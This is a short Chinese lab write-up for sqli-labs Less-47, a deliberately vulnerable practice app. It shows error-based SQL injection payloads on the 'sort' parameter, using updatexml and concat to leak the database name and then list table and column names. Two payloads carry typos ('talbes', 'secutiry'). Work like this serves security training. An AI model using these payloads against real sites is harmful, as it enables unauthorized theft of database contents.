sqli-labs-Less-47

SQLI-LAPS 实验记录

Less-47

这一关与之前的关卡类似,只是闭合的方式不同。

首先我们在Password这一点输入Payload如下:

sql 复制代码
?sort=1

结果如图所示,页面以第一列为顺序,返回了数据库当中的数据。


之后,我们可以使用报错注入的方式,对数据库名、表名等内容进行注入。

php 复制代码
?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

结果如图所示,返回了数据库名。

后续爆出数据库的表名、列名等方式如下:

  • 爆出表名:
php 复制代码
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.talbes where table_schema='secutiry'),0x7e),1)--+
  • 爆出列名:
php 复制代码
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+
相关推荐
笨手笨脚の2 小时前
Java 性能优化
java·jvm·数据库·性能优化·分布式锁·分布式事务·并发容器
草莓熊Lotso2 小时前
MySQL 数据类型核心指南:选型、实战与避坑
linux·运维·服务器·数据库·c++·人工智能·mysql
半个俗人2 小时前
8.jmeter直连数据库-MySQL
数据库·jmeter
DolphinScheduler社区2 小时前
Apache DolphinScheduler 3.4.1 发布,新增任务分发超时检测
java·数据库·开源·apache·海豚调度·大数据工作流调度
阿梦Anmory2 小时前
快速部署Milvus 2.6.4单机版向量数据库(Docker Compose方式)
数据库·docker·milvus
小陳参上2 小时前
使用Flask快速搭建轻量级Web应用
jvm·数据库·python
啥都想学点2 小时前
pikachu靶场——SQL-Inject—3(Kali系统)
数据库·sql
WangYaolove13142 小时前
基于python的多媒体资料管理系统(源码+文档)
python·mysql·django·毕业设计·源码
惊讶的猫2 小时前
influxdb(时序数据库)+mqtt(emqx+mqtt客户端)
数据库·时序数据库